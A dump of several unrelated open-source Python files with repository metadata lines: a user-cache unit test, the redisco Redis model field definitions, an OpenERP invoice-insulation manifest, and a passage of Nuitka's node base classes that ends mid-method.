test_trip = ecwt.Trip({'start_local_dt': test_dt, 'start_fmt_time': adt.isoformat()})
test_handler = enuah.UserCacheHandler.getUserCacheHandler(self.testUserUUID1)
self.assertEqual(test_handler.get_local_day_from_fmt_time(test_trip), "2016-01-01")
self.assertEqual(test_handler.get_local_day_from_local_dt(test_trip), "2016-01-01")
def testGetTripListForSevenDays(self):
test_handler = enuah.UserCacheHandler.getUserCacheHandler(self.testUserUUID1)
def testGetObsoleteEntries(self):
valid_entries = ["2015-12-30", "2015-12-29", "2015-12-31", "2015-01-01"]
uc = enua.UserCache.getUserCache(self.testUserUUID1)
uch = enuah.UserCacheHandler.getUserCacheHandler(self.testUserUUID1)
uc.putDocument("2015-12-30", {"a": 1})
uc.putDocument("2015-12-29", {"a": 1})
uc.putDocument("2015-12-28", {"a": 1})
uc.putDocument("2015-12-27", {"a": 1})
uc.putDocument("2015-12-26", {"a": 1})
obsolete_entries = uch.get_obsolete_entries(uc, valid_entries)
# the result should include entries that are in the past (28,27,26), but should
# NOT include newly added entries
self.assertEqual(obsolete_entries, set(["2015-12-28", "2015-12-27", "2015-12-26"]))
def testDeleteObsoleteEntries(self):
valid_bins = {"2015-12-30":[{"b": 2}],
"2015-12-29":[{"b": 2}],
"2015-12-31":[{"b": 2}]}
uc = enua.UserCache.getUserCache(self.testUserUUID1)
uch = enuah.UserCacheHandler.getUserCacheHandler(self.testUserUUID1)
uc.putDocument("2015-12-30", {"a": 1})
uc.putDocument("2015-12-29", {"a": 1})
uc.putDocument("2015-12-28", {"a": 1})
uc.putDocument("2015-12-27", {"a": 1})
uc.putDocument("2015-12-26", {"a": 1})
uch.delete_obsolete_entries(uc, list(valid_bins.iterkeys()))
# the result should include entries that are in the past (28,27,26), but should
# NOT include newly added entries
self.assertEqual(uc.getDocumentKeyList(), ["2015-12-30", "2015-12-29"])
def testRetainSetConfig(self):
valid_bins = {"2015-12-30":[{"b": 2}],
"2015-12-29":[{"b": 2}],
"2015-12-31":[{"b": 2}]}
uc = enua.UserCache.getUserCache(self.testUserUUID1)
uch = enuah.UserCacheHandler.getUserCacheHandler(self.testUserUUID1)
uc.putDocument("2015-12-30", {"a": 1})
uc.putDocument("2015-12-29", {"a": 1})
uc.putDocument("2015-12-28", {"a": 1})
uc.putDocument("2015-12-27", {"a": 1})
uc.putDocument("2015-12-26", {"a": 1})
uc.putDocument("config/sensor_config", {"a": 1})
uch.delete_obsolete_entries(uc, list(valid_bins.iterkeys()))
# the result should include entries that are in the past (28,27,26), but should
# NOT include newly added entries
self.assertEqual(uc.getDocumentKeyList(), ["2015-12-30", "2015-12-29",
"config/sensor_config"])
if __name__ == '__main__':
import emission.tests.common as etc
etc.configLogging()
unittest.main()
| bsd-3-clause | -6,776,570,745,570,059,000 | 48.236111 | 107 | 0.651058 | false |
heckj/redisco | redisco/models/attributes.py | 1 | 15052 | # -*- coding: utf-8 -*-
"""
Defines the fields that can be added to redisco models.
"""
import sys
from datetime import datetime, date
from dateutil.tz import tzutc, tzlocal
from calendar import timegm
from redisco.containers import List
from exceptions import FieldValidationError, MissingID
__all__ = ['Attribute', 'CharField', 'ListField', 'DateTimeField',
'DateField', 'ReferenceField', 'Collection', 'IntegerField',
'FloatField', 'BooleanField', 'Counter']
class Attribute(object):
"""Defines an attribute of the model.
The attribute accepts strings and are stored in Redis as
they are - strings.
Options
name -- alternate name of the attribute. This will be used
as the key to use when interacting with Redis.
indexed -- Index this attribute. Unindexed attributes cannot
be used in queries. Default: True.
unique -- validates the uniqueness of the value of the
attribute.
validator -- a callable that can validate the value of the
attribute.
default -- Initial value of the attribute.
"""
def __init__(self,
name=None,
indexed=True,
required=False,
validator=None,
unique=False,
default=None):
self.name = name
self.indexed = indexed
self.required = required
self.validator = validator
self.default = default
self.unique = unique
self.zindexable = False
def __get__(self, instance, owner):
try:
return getattr(instance, '_' + self.name)
except AttributeError:
if callable(self.default):
default = self.default()
else:
default = self.default
self.__set__(instance, default)
return default
def __set__(self, instance, value):
setattr(instance, '_' + self.name, value)
def typecast_for_read(self, value):
"""Typecasts the value for reading from Redis."""
# The redis client encodes all unicode data to utf-8 by default.
return value.decode('utf-8')
def typecast_for_storage(self, value):
"""Typecasts the value for storing to Redis."""
try:
return unicode(value)
except UnicodeError:
return value.decode('utf-8')
def value_type(self):
return unicode
def acceptable_types(self):
return basestring
def validate(self, instance):
val = getattr(instance, self.name)
errors = []
# type_validation
if val is not None and not isinstance(val, self.acceptable_types()):
errors.append((self.name, 'bad type',))
# validate first standard stuff
if self.required:
if val is None or not unicode(val).strip():
errors.append((self.name, 'required'))
# validate uniquness
if val and self.unique:
error = self.validate_uniqueness(instance, val)
if error:
errors.append(error)
# validate using validator
if self.validator:
r = self.validator(self.name, val)
if r:
errors.extend(r)
if errors:
raise FieldValidationError(errors)
def validate_uniqueness(self, instance, val):
encoded = self.typecast_for_storage(val)
matches = instance.__class__.objects.filter(**{self.name: encoded})
if len(matches) > 0:
try:
instance_id = instance.id
no_id = False
except MissingID:
no_id = True
if (len(matches) != 1) or no_id or (
matches.first().id != instance.id):
return (self.name, 'not unique',)
class CharField(Attribute):
def __init__(self, max_length=255, **kwargs):
super(CharField, self).__init__(**kwargs)
self.max_length = max_length
def validate(self, instance):
errors = []
super(CharField, self).validate(instance)
val = getattr(instance, self.name)
if val and len(val) > self.max_length:
errors.append((self.name, 'exceeds max length'))
if errors:
raise FieldValidationError(errors)
class BooleanField(Attribute):
def typecast_for_read(self, value):
return bool(int(value))
def typecast_for_storage(self, value):
if value is None:
return "0"
return "1" if value else "0"
def value_type(self):
return bool
def acceptable_types(self):
return self.value_type()
class IntegerField(Attribute):
def __init__(self, **kwargs):
super(IntegerField, self).__init__(**kwargs)
self.zindexable = True
def typecast_for_read(self, value):
return int(value)
def typecast_for_storage(self, value):
if value is None:
return "0"
return unicode(value)
def value_type(self):
return int
def acceptable_types(self):
return (int, long)
class FloatField(Attribute):
def __init__(self, **kwargs):
super(FloatField, self).__init__(**kwargs)
self.zindexable = True
def typecast_for_read(self, value):
return float(value)
def typecast_for_storage(self, value):
if value is None:
return "0"
return "%f" % value
def value_type(self):
return float
def acceptable_types(self):
return self.value_type()
class DateTimeField(Attribute):
def __init__(self, auto_now=False, auto_now_add=False, **kwargs):
super(DateTimeField, self).__init__(**kwargs)
self.auto_now = auto_now
self.auto_now_add = auto_now_add
self.zindexable = True
def typecast_for_read(self, value):
try:
# We load as if the timestampe was naive
dt = datetime.fromtimestamp(float(value), tzutc())
# And gently override (ie: not convert) to the TZ to UTC
return dt
except TypeError, ValueError:
return None
def typecast_for_storage(self, value):
if not isinstance(value, datetime):
raise TypeError("%s should be datetime object, and not a %s" %
(self.name, type(value)))
if value is None:
return None
# Are we timezone aware ? If no, make it TimeZone Local
if value.tzinfo is None:
value = value.replace(tzinfo=tzlocal())
return "%d.%06d" % (float(timegm(value.utctimetuple())),
value.microsecond)
def value_type(self):
return datetime
def acceptable_types(self):
return self.value_type()
class DateField(Attribute):
def __init__(self, auto_now=False, auto_now_add=False, **kwargs):
super(DateField, self).__init__(**kwargs)
self.auto_now = auto_now
self.auto_now_add = auto_now_add
self.zindexable = True
def typecast_for_read(self, value):
try:
dt = date.fromordinal(int(value))
return dt
except TypeError, ValueError:
return None
def typecast_for_storage(self, value):
if not isinstance(value, date):
raise TypeError("%s should be date object, and not a %s" %
(self.name, type(value)))
if value is None:
return None
return "%d" % value.toordinal()
def value_type(self):
return date
def acceptable_types(self):
return self.value_type()
class ListField(object):
"""Stores a list of objects.
target_type -- can be a Python object or a redisco model class.
If target_type is not a redisco model class, the target_type should
also a callable that casts the (string) value of a list element into
target_type. E.g. str, unicode, int, float.
ListField also accepts a string that refers to a redisco model.
"""
def __init__(self, target_type,
name=None,
indexed=True,
required=False,
validator=None,
default=None):
self._target_type = target_type
self.name = name
self.indexed = indexed
self.required = required
self.validator = validator
self.default = default or []
from base import Model
self._redisco_model = (isinstance(target_type, basestring) or
issubclass(target_type, Model))
def __get__(self, instance, owner):
try:
return getattr(instance, '_' + self.name)
except AttributeError:
if instance.is_new():
val = self.default
else:
key = instance.key(att=self.name)
val = List(key).members
if val is not None:
klass = self.value_type()
if self._redisco_model:
val = filter(lambda o: o is not None,
[klass.objects.get_by_id(v) for v in val])
else:
val = [klass(v) for v in val]
self.__set__(instance, val)
return val
def __set__(self, instance, value):
setattr(instance, '_' + self.name, value)
def value_type(self):
if isinstance(self._target_type, basestring):
t = self._target_type
from base import get_model_from_key
self._target_type = get_model_from_key(self._target_type)
if self._target_type is None:
raise ValueError("Unknown Redisco class %s" % t)
return self._target_type
def validate(self, instance):
val = getattr(instance, self.name)
errors = []
if val:
if not isinstance(val, list):
errors.append((self.name, 'bad type'))
else:
for item in val:
if not isinstance(item, self.value_type()):
errors.append((self.name, 'bad type in list'))
# validate first standard stuff
if self.required:
if not val:
errors.append((self.name, 'required'))
# validate using validator
if self.validator:
r = self.validator(val)
if r:
errors.extend(r)
if errors:
raise FieldValidationError(errors)
class Collection(object):
"""
A simple container that will be replaced by the good imports
and the good filter query.
"""
def __init__(self, target_type):
self.target_type = target_type
def __get__(self, instance, owner):
if not isinstance(self.target_type, str):
raise TypeError("A collection only accepts a string "
"representing the Class")
# __import__ should be something like
# __import__('mymod.mysubmod', fromlist=['MyClass'])
klass_path = self.target_type.split(".")
fromlist = klass_path[-1]
frompath = ".".join(klass_path[0:-1])
# if the path is not empty, then it worth importing the class,
# otherwise, its a local Class and it's already been imported.
if frompath:
mod = __import__(frompath, fromlist=[fromlist])
else:
mod = sys.modules[__name__]
klass = getattr(mod, fromlist)
return klass.objects.filter(
**{instance.__class__.__name__.lower() + '_id': instance.id})
def __set__(self, instance, value):
"""
Prevent the argument to be overriden
"""
raise AttributeError("can't override a collection of object")
class ReferenceField(object):
def __init__(self,
target_type,
name=None,
attname=None,
indexed=True,
required=False,
related_name=None,
default=None,
validator=None):
self._target_type = target_type
self.name = name
self.indexed = indexed
self.required = required
self._attname = attname
self._related_name = related_name
self.validator = validator
self.default = default
def __set__(self, instance, value):
"""
Will set the referenced object unless None is provided
which will simply remove the reference
"""
if not isinstance(value, self.value_type()) and \
value is not None:
raise TypeError
# remove the cached value from the instance
if hasattr(instance, '_' + self.name):
delattr(instance, '_' + self.name)
# Remove the attribute_id reference
setattr(instance, self.attname, None)
# Set it to the new value if any.
if value is not None:
setattr(instance, self.attname, value.id)
def __get__(self, instance, owner):
try:
if not hasattr(instance, '_' + self.name):
o = self.value_type().objects.get_by_id(
getattr(instance, self.attname))
setattr(instance, '_' + self.name, o)
return getattr(instance, '_' + self.name)
except AttributeError:
setattr(instance, '_' + self.name, self.default)
return self.default
def value_type(self):
return self._target_type
@property
def attname(self):
if self._attname is None:
self._attname = self.name + '_id'
return self._attname
@property
def related_name(self):
return self._related_name
def validate(self, instance):
val = getattr(instance, self.name)
errors = []
if val:
if not isinstance(val, self.value_type()):
errors.append((self.name, 'bad type for reference'))
# validate first standard stuff
if self.required:
if not val:
errors.append((self.name, 'required'))
# validate using validator
if self.validator:
r = self.validator(val)
if r:
errors.extend(r)
if errors:
raise FieldValidationError(errors)
class Counter(IntegerField):
def __init__(self, **kwargs):
super(Counter, self).__init__(**kwargs)
if not 'default' in kwargs or self.default is None:
self.default = 0
self.zindexable = True
def __set__(self, instance, value):
raise AttributeError("can't set a counter.")
def __get__(self, instance, owner):
if not instance.is_new():
v = instance.db.hget(instance.key(), self.name)
if v is None:
return 0
return int(v)
else:
return 0
| mit | -8,004,247,094,733,032,000 | 30.48954 | 76 | 0.554411 | false |
mathi123/vertical-construction | __unported__/account_invoice_insulation/__openerp__.py | 1 | 1644 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2012 Savoir-faire Linux (<http://www.savoirfairelinux.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
"name" : "Invoice Insulation",
"version" : "0.1",
"author" : "Savoir-faire Linux,Odoo Community Association (OCA)",
"website" : "http://www.savoirfairelinux.com",
"license" : "AGPL-3",
"category" : "Accounting",
"description" : """
This module allows you to generate invoices with thermal resistance for insulation products.
""",
"depends" : [
"account",
"product_insulation",
],
"images" : [],
"test" : [],
"demo" : [],
"data" : [
"report/account_invoice_insulation_report.xml",
"account_invoice_insulation_view.xml",
],
"installable": True,
"complexity": "easy",
}
| agpl-3.0 | -4,156,243,103,328,499,000 | 35.533333 | 92 | 0.599148 | false |
kayhayen/Nuitka | nuitka/nodes/NodeBases.py | 1 | 35111 | # Copyright 2021, Kay Hayen, mailto:[email protected]
#
# Part of "Nuitka", an optimizing Python compiler that is compatible and
# integrates with CPython, but also works on its own.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
""" Node base classes.
These classes provide the generic base classes available for nodes,
statements or expressions alike. There is a dedicated module for
expression only stuff.
"""
# from abc import abstractmethod
from abc import abstractmethod
from nuitka import Options, Tracing, TreeXML, Variables
from nuitka.__past__ import iterItems
from nuitka.Errors import NuitkaNodeDesignError, NuitkaNodeError
from nuitka.PythonVersions import python_version
from nuitka.SourceCodeReferences import SourceCodeReference
from nuitka.utils.InstanceCounters import (
counted_del,
counted_init,
isCountingInstances,
)
from .FutureSpecs import fromFlags
from .NodeMakingHelpers import makeStatementOnlyNodesFromExpressions
from .NodeMetaClasses import NodeCheckMetaClass, NodeMetaClassBase
class NodeBase(NodeMetaClassBase):
__slots__ = "parent", "source_ref"
# Avoid the attribute unless it's really necessary.
if Options.is_fullcompat:
__slots__ += ("effective_source_ref",)
# String to identify the node class, to be consistent with its name.
kind = None
@counted_init
def __init__(self, source_ref):
# The base class has no __init__ worth calling.
# Check source reference to meet basic standards, so we note errors
# when they occur.
assert source_ref is not None
assert source_ref.line is not None
self.parent = None
self.source_ref = source_ref
if isCountingInstances():
__del__ = counted_del()
@abstractmethod
def finalize(self):
pass
def __repr__(self):
return "<Node %s>" % (self.getDescription())
def getDescription(self):
"""Description of the node, intended for use in __repr__ and
graphical display.
"""
details = self.getDetailsForDisplay()
if details:
return "'%s' with %s" % (self.kind, details)
else:
return "'%s'" % self.kind
def getDetails(self):
"""Details of the node, intended for re-creation.
We are not using the pickle mechanisms, but this is basically
part of what the constructor call needs. Real children will
also be added.
"""
# Virtual method, pylint: disable=no-self-use
return {}
def getDetailsForDisplay(self):
"""Details of the node, intended for use in __repr__ and dumps.
This is also used for XML.
"""
return self.getDetails()
def getCloneArgs(self):
return self.getDetails()
def makeClone(self):
try:
# Using star dictionary arguments here for generic use.
result = self.__class__(source_ref=self.source_ref, **self.getCloneArgs())
except TypeError as e:
raise NuitkaNodeError("Problem cloning node", self, e)
effective_source_ref = self.getCompatibleSourceReference()
if effective_source_ref is not self.source_ref:
result.setCompatibleSourceReference(effective_source_ref)
return result
def makeCloneShallow(self):
args = self.getDetails()
args.update(self.getVisitableNodesNamed())
try:
# Using star dictionary arguments here for generic use.
result = self.__class__(source_ref=self.source_ref, **args)
except TypeError as e:
raise NuitkaNodeError("Problem cloning node", self, e)
effective_source_ref = self.getCompatibleSourceReference()
if effective_source_ref is not self.source_ref:
result.setCompatibleSourceReference(effective_source_ref)
return result
def getParent(self):
"""Parent of the node. Every node except modules have to have a parent."""
if self.parent is None and not self.isCompiledPythonModule():
# print self.getVisitableNodesNamed()
assert False, (self, self.source_ref)
return self.parent
def getChildName(self):
"""Return the role in the current parent, subject to changes."""
parent = self.getParent()
for key, value in parent.getVisitableNodesNamed():
if self is value:
return key
if type(value) is tuple:
if self in value:
return key, value.index(self)
return None
def getChildNameNice(self):
child_name = self.getChildName()
if hasattr(self.parent, "nice_children"):
return self.parent.nice_children[
self.parent.named_children.index(child_name)
]
elif hasattr(self.parent, "nice_child"):
return self.parent.nice_child
else:
return child_name
def getParentFunction(self):
"""Return the parent that is a function."""
parent = self.getParent()
while parent is not None and not parent.isExpressionFunctionBodyBase():
parent = parent.getParent()
return parent
def getParentModule(self):
"""Return the parent that is module."""
parent = self
while not parent.isCompiledPythonModule():
if hasattr(parent, "provider"):
# After we checked, we can use it, will be much faster route
# to take.
parent = parent.provider
else:
parent = parent.getParent()
return parent
def isParentVariableProvider(self):
# Check if it's a closure giver, in which cases it can provide variables,
return isinstance(self, ClosureGiverNodeMixin)
def getParentVariableProvider(self):
parent = self.getParent()
while not parent.isParentVariableProvider():
parent = parent.getParent()
return parent
def getParentReturnConsumer(self):
parent = self.getParent()
while (
not parent.isParentVariableProvider()
and not parent.isExpressionOutlineBody()
):
parent = parent.getParent()
return parent
def getParentStatementsFrame(self):
current = self.getParent()
while True:
if current.isStatementsFrame():
return current
if current.isParentVariableProvider():
return None
if current.isExpressionOutlineBody():
return None
current = current.getParent()
def getSourceReference(self):
return self.source_ref
def setCompatibleSourceReference(self, source_ref):
"""Bug compatible line numbers information.
As CPython outputs the last bit of bytecode executed, and not the
line of the operation. For example calls, output the line of the
last argument, as opposed to the line of the operation start.
For tests, we wants to be compatible. In improved more, we are
not being fully compatible, and just drop it altogether.
"""
# Getting the same source reference can be dealt with quickly, so do
# this first.
if (
self.source_ref is not source_ref
and Options.is_fullcompat
and self.source_ref != source_ref
):
# An attribute outside of "__init__", so we save one memory for the
# most cases. Very few cases involve splitting across lines.
# false alarm for non-slot:
# pylint: disable=I0021,assigning-non-slot,attribute-defined-outside-init
self.effective_source_ref = source_ref
def getCompatibleSourceReference(self):
"""Bug compatible line numbers information.
See above.
"""
return getattr(self, "effective_source_ref", self.source_ref)
def asXml(self):
line = self.source_ref.getLineNumber()
result = TreeXML.Element("node", kind=self.__class__.__name__, line="%s" % line)
compat_line = self.getCompatibleSourceReference().getLineNumber()
if compat_line != line:
result.attrib["compat_line"] = str(compat_line)
for key, value in iterItems(self.getDetailsForDisplay()):
result.set(key, str(value))
for name, children in self.getVisitableNodesNamed():
role = TreeXML.Element("role", name=name)
result.append(role)
if children is None:
role.attrib["type"] = "none"
elif type(children) not in (list, tuple):
role.append(children.asXml())
else:
role.attrib["type"] = "list"
for child in children:
role.append(child.asXml())
return result
@classmethod
def fromXML(cls, provider, source_ref, **args):
# Only some things need a provider, pylint: disable=unused-argument
return cls(source_ref=source_ref, **args)
def asXmlText(self):
xml = self.asXml()
return TreeXML.toString(xml)
def dump(self, level=0):
Tracing.printIndented(level, self)
Tracing.printSeparator(level)
for visitable in self.getVisitableNodes():
visitable.dump(level + 1)
Tracing.printSeparator(level)
@staticmethod
def isStatementsFrame():
return False
@staticmethod
def isCompiledPythonModule():
# For overload by module nodes
return False
def isExpression(self):
return self.kind.startswith("EXPRESSION_")
def isStatement(self):
return self.kind.startswith("STATEMENT_")
def isExpressionBuiltin(self):
return self.kind.startswith("EXPRESSION_BUILTIN_")
@staticmethod
def isExpressionConstantRef():
return False
@staticmethod
def isExpressionOperationUnary():
return False
@staticmethod
def isExpressionOperationBinary():
return False
@staticmethod
def isExpressionOperationInplace():
return False
@staticmethod
def isExpressionComparison():
return False
@staticmethod
def isExpressionSideEffects():
return False
@staticmethod
def isExpressionMakeSequence():
return False
@staticmethod
def isNumberConstant():
return False
@staticmethod
def isExpressionCall():
return False
@staticmethod
def isExpressionFunctionBodyBase():
return False
@staticmethod
def isExpressionOutlineFunctionBase():
return False
def visit(self, context, visitor):
visitor(self)
for visitable in self.getVisitableNodes():
visitable.visit(context, visitor)
@staticmethod
def getVisitableNodes():
return ()
@staticmethod
def getVisitableNodesNamed():
"""Named children dictionary.
For use in debugging and XML output.
"""
return ()
@staticmethod
def getName():
"""Name of the node if any."""
return None
@staticmethod
def mayHaveSideEffects():
"""Unless we are told otherwise, everything may have a side effect."""
return True
def isOrderRelevant(self):
return self.mayHaveSideEffects()
def extractSideEffects(self):
"""Unless defined otherwise, the expression is the side effect."""
return (self,)
@staticmethod
def mayRaiseException(exception_type):
"""Unless we are told otherwise, everything may raise everything."""
# Virtual method, pylint: disable=unused-argument
return True
@staticmethod
def mayReturn():
"""May this node do a return exit, to be overloaded for things that might."""
return False
@staticmethod
def mayBreak():
return False
@staticmethod
def mayContinue():
return False
def needsFrame(self):
"""Unless we are tolder otherwise, this depends on exception raise."""
return self.mayRaiseException(BaseException)
@staticmethod
def willRaiseException(exception_type):
"""Unless we are told otherwise, nothing may raise anything."""
# Virtual method, pylint: disable=unused-argument
return False
@staticmethod
def isStatementAborting():
"""Is the node aborting, control flow doesn't continue after this node."""
return False
class CodeNodeMixin(object):
# Mixins are not allow to specify slots, pylint: disable=assigning-non-slot
__slots__ = ()
def __init__(self, name, code_prefix):
assert name is not None
self.name = name
self.code_prefix = code_prefix
# The code name is determined on demand only.
self.code_name = None
# The "UID" values of children kinds are kept here.
self.uids = {}
def getName(self):
return self.name
def getCodeName(self):
if self.code_name is None:
provider = self.getParentVariableProvider().getEntryPoint()
parent_name = provider.getCodeName()
uid = "_%d" % provider.getChildUID(self)
assert isinstance(self, CodeNodeMixin)
if self.name:
name = uid + "_" + self.name.strip("<>")
else:
name = uid
if str is not bytes:
name = name.encode("ascii", "c_identifier").decode()
self.code_name = "%s$$$%s_%s" % (parent_name, self.code_prefix, name)
return self.code_name
def getChildUID(self, node):
if node.kind not in self.uids:
self.uids[node.kind] = 0
self.uids[node.kind] += 1
return self.uids[node.kind]
class ChildrenHavingMixin(object):
# Mixins are not allow to specify slots.
__slots__ = ()
named_children = ()
checkers = {}
def __init__(self, values):
assert (
type(self.named_children) is tuple and self.named_children
), self.named_children
# TODO: Make this true.
# assert len(self.named_children) > 1, self.kind
# Check for completeness of given values, everything should be there
# but of course, might be put to None.
if set(values.keys()) != set(self.named_children):
raise NuitkaNodeDesignError(
"Must pass named children in value dictionary",
set(values.keys()),
set(self.named_children),
)
for name, value in values.items():
if name in self.checkers:
value = self.checkers[name](value)
if type(value) is tuple:
assert None not in value, name
for val in value:
val.parent = self
elif value is None:
pass
else:
value.parent = self
attr_name = "subnode_" + name
setattr(self, attr_name, value)
def setChild(self, name, value):
"""Set a child value.
Do not overload, provider self.checkers instead.
"""
# Only accept legal child names
assert name in self.named_children, name
# Lists as inputs are OK, but turn them into tuples.
if type(value) is list:
value = tuple(value)
if name in self.checkers:
value = self.checkers[name](value)
# Re-parent value to us.
if type(value) is tuple:
for val in value:
val.parent = self
elif value is not None:
value.parent = self
attr_name = "subnode_" + name
# Determine old value, and inform it about losing its parent.
old_value = getattr(self, attr_name)
assert old_value is not value, value
setattr(self, attr_name, value)
def clearChild(self, name):
# Only accept legal child names
assert name in self.named_children, name
if name in self.checkers:
self.checkers[name](None)
attr_name = "subnode_" + name
# Determine old value, and inform it about losing its parent.
old_value = getattr(self, attr_name)
assert old_value is not None
setattr(self, attr_name, None)
def getChild(self, name):
attr_name = "subnode_" + name
return getattr(self, attr_name)
def getVisitableNodes(self):
# TODO: Consider if a generator would be faster.
result = []
for name in self.named_children:
attr_name = "subnode_" + name
value = getattr(self, attr_name)
if value is None:
pass
elif type(value) is tuple:
result += list(value)
elif isinstance(value, NodeBase):
result.append(value)
else:
raise AssertionError(
self, "has illegal child", name, value, value.__class__
)
return tuple(result)
def getVisitableNodesNamed(self):
"""Named children dictionary.
For use in debugging and XML output.
"""
for name in self.named_children:
attr_name = "subnode_" + name
value = getattr(self, attr_name)
yield name, value
def replaceChild(self, old_node, new_node):
if new_node is not None and not isinstance(new_node, NodeBase):
raise AssertionError(
"Cannot replace with", new_node, "old", old_node, "in", self
)
# Find the replaced node, as an added difficulty, what might be
# happening, is that the old node is an element of a tuple, in which we
# may also remove that element, by setting it to None.
for key in self.named_children:
value = self.getChild(key)
if value is None:
pass
elif type(value) is tuple:
if old_node in value:
if new_node is not None:
self.setChild(
key,
tuple(
(val if val is not old_node else new_node)
for val in value
),
)
else:
self.setChild(
key, tuple(val for val in value if val is not old_node)
)
return key
elif isinstance(value, NodeBase):
if old_node is value:
self.setChild(key, new_node)
return key
else:
assert False, (key, value, value.__class__)
raise AssertionError("Didn't find child", old_node, "in", self)
def getCloneArgs(self):
values = {}
for key in self.named_children:
value = self.getChild(key)
assert type(value) is not list, key
if value is None:
values[key] = None
elif type(value) is tuple:
values[key] = tuple(v.makeClone() for v in value)
else:
values[key] = value.makeClone()
values.update(self.getDetails())
return values
def finalize(self):
del self.parent
for c in self.getVisitableNodes():
c.finalize()
class ClosureGiverNodeMixin(CodeNodeMixin):
"""Base class for nodes that provide variables for closure takers."""
# Mixins are not allow to specify slots, pylint: disable=assigning-non-slot
__slots__ = ()
def __init__(self, name, code_prefix):
CodeNodeMixin.__init__(self, name=name, code_prefix=code_prefix)
self.temp_variables = {}
self.temp_scopes = {}
self.preserver_id = 0
def hasProvidedVariable(self, variable_name):
return self.locals_scope.hasProvidedVariable(variable_name)
def getProvidedVariable(self, variable_name):
if not self.locals_scope.hasProvidedVariable(variable_name):
variable = self.createProvidedVariable(variable_name=variable_name)
self.locals_scope.registerProvidedVariable(variable)
return self.locals_scope.getProvidedVariable(variable_name)
@abstractmethod
def createProvidedVariable(self, variable_name):
"""Create a variable provided by this function."""
def allocateTempScope(self, name):
self.temp_scopes[name] = self.temp_scopes.get(name, 0) + 1
return "%s_%d" % (name, self.temp_scopes[name])
def allocateTempVariable(self, temp_scope, name, temp_type=None):
if temp_scope is not None:
full_name = "%s__%s" % (temp_scope, name)
else:
assert name != "result"
full_name = name
# No duplicates please.
assert full_name not in self.temp_variables, full_name
result = self.createTempVariable(temp_name=full_name, temp_type=temp_type)
# Late added temp variables should be treated with care for the
# remaining trace.
if self.trace_collection is not None:
self.trace_collection.initVariableUnknown(result).addUsage()
return result
def createTempVariable(self, temp_name, temp_type):
if temp_name in self.temp_variables:
return self.temp_variables[temp_name]
if temp_type is None:
temp_class = Variables.TempVariable
elif temp_type == "bool":
temp_class = Variables.TempVariableBool
else:
assert False, temp_type
result = temp_class(owner=self, variable_name=temp_name)
self.temp_variables[temp_name] = result
return result
def getTempVariable(self, temp_scope, name):
if temp_scope is not None:
full_name = "%s__%s" % (temp_scope, name)
else:
full_name = name
return self.temp_variables[full_name]
def getTempVariables(self):
return self.temp_variables.values()
def _removeTempVariable(self, variable):
del self.temp_variables[variable.getName()]
def optimizeUnusedTempVariables(self):
remove = []
for temp_variable in self.getTempVariables():
empty = self.trace_collection.hasEmptyTraces(variable=temp_variable)
if empty:
remove.append(temp_variable)
for temp_variable in remove:
self._removeTempVariable(temp_variable)
def allocatePreserverId(self):
if python_version >= 0x300:
self.preserver_id += 1
return self.preserver_id
class ClosureTakerMixin(object):
"""Mixin for nodes that accept variables from closure givers."""
# Mixins are not allow to specify slots, pylint: disable=assigning-non-slot
__slots__ = ()
def __init__(self, provider):
self.provider = provider
self.taken = set()
def getParentVariableProvider(self):
return self.provider
def getClosureVariable(self, variable_name):
result = self.provider.getVariableForClosure(variable_name=variable_name)
assert result is not None, variable_name
if not result.isModuleVariable():
self.addClosureVariable(result)
return result
def addClosureVariable(self, variable):
self.taken.add(variable)
return variable
def getClosureVariables(self):
return tuple(
sorted(
[take for take in self.taken if not take.isModuleVariable()],
key=lambda x: x.getName(),
)
)
def getClosureVariableIndex(self, variable):
closure_variables = self.getClosureVariables()
for count, closure_variable in enumerate(closure_variables):
if variable is closure_variable:
return count
raise IndexError(variable)
def hasTakenVariable(self, variable_name):
for variable in self.taken:
if variable.getName() == variable_name:
return True
return False
def getTakenVariable(self, variable_name):
for variable in self.taken:
if variable.getName() == variable_name:
return variable
return None
class StatementBase(NodeBase):
"""Base class for all statements."""
# Base classes can be abstract, pylint: disable=abstract-method
# TODO: Have them all.
# @abstractmethod
@staticmethod
def getStatementNiceName():
return "undescribed statement"
def computeStatementSubExpressions(self, trace_collection):
"""Compute a statement.
Default behavior is to just visit the child expressions first, and
then the node "computeStatement". For a few cases this needs to
be overloaded.
"""
expressions = self.getVisitableNodes()
for count, expression in enumerate(expressions):
assert expression.isExpression(), (self, expression)
expression = trace_collection.onExpression(expression=expression)
if expression.willRaiseException(BaseException):
wrapped_expression = makeStatementOnlyNodesFromExpressions(
expressions[: count + 1]
)
assert wrapped_expression is not None
return (
wrapped_expression,
"new_raise",
lambda: "For %s the child expression '%s' will raise."
% (self.getStatementNiceName(), expression.getChildNameNice()),
)
return self, None, None
class StatementChildrenHavingBase(ChildrenHavingMixin, StatementBase):
def __init__(self, values, source_ref):
StatementBase.__init__(self, source_ref=source_ref)
ChildrenHavingMixin.__init__(self, values=values)
class StatementChildHavingBase(StatementBase):
named_child = ""
checker = None
def __init__(self, value, source_ref):
StatementBase.__init__(self, source_ref=source_ref)
assert type(self.named_child) is str and self.named_child
if self.checker is not None:
value = self.checker(value) # False alarm, pylint: disable=not-callable
assert type(value) is not list, self.named_child
if type(value) is tuple:
assert None not in value, self.named_child
for val in value:
val.parent = self
elif value is not None:
value.parent = self
elif value is None:
pass
else:
assert False, type(value)
attr_name = "subnode_" + self.named_child
setattr(self, attr_name, value)
def setChild(self, name, value):
"""Set a child value.
Do not overload, provider self.checkers instead.
"""
# Only accept legal child names
assert name == self.named_child, name
# Lists as inputs are OK, but turn them into tuples.
